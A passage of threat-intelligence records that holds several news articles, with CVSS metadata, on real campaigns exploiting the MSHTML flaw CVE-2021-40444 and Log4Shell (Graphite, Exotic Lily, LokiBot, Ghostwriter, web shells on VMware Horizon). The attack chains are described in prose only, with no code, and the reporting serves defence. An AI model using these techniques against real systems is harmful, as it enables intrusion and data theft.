([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (&amp; dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-17T10:25:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgvDZwAvn3cgUi_f3vxBMVikb6ovW0qHC4JUcgJIDgrR-bZtLcWA-DuDUESrnzwlMPy5XnlvllCfYWLP0ItGPUmZE74JhP2EDfe2PfF9Mdw7NvA1YE5MCkG-2t3FkvdqxmnCqRQjXifFbfSO2x0QSfvmBwzdJPOvhe22mxbmWhBpSWmZgIBCgpD0MjI>)\n\nThe digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched [VMware Horizon](<https://www.vmware.com/products/horizon.html>) servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.\n\n\"The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure,\" the non-departmental public body [said](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>) in an alert. \"Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.\"\n\nThe web shell, once deployed, can serve as a conduit to carry out a multitude of post-exploitation activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiQZlFBiTCDw52oclkWnjMIJ4v4BdC7aS_jWnpdRdwKdhYFmpJ-482rUQYunlJpkw3q-qsVcoe33QDomLPJAYXW8chL_4Xv-Pj9exnGpxQJW4kPs8w4GGUVLCABKX72ljfTrILX-aCltAwge-FPu1Ew6Zd3kTM9FzGmlK3BSjH2GIdZArZOqDJTY4NM>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution flaw in Apache Log4j 2, an ubiquitous open-source logging framework, which has been put to use as part of [different malware campaigns](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) since it came to light in December 2021. An array of hacking groups, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to date.\n\nThe development also marks the second time VMware products have come under exploitation stemming as a result of vulnerabilities in the Log4j library. Last month, AdvIntel researchers [disclosed](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) that attackers were targeting systems running VMware VCenter servers with the aim of installing Conti ransomware.\n\nVMware, for its part, has already [released security updates](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) for Horizon, VCenter, and other products last month that have been impacted by Log4Shell, with the virtualization services provider acknowledging scanning attempts in the wild, urging customers to install the patches where applicable or apply workarounds temporarily to counter any potential risk.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T07:04:00", "type": "thn", "title": "NHS Warns of Hackers 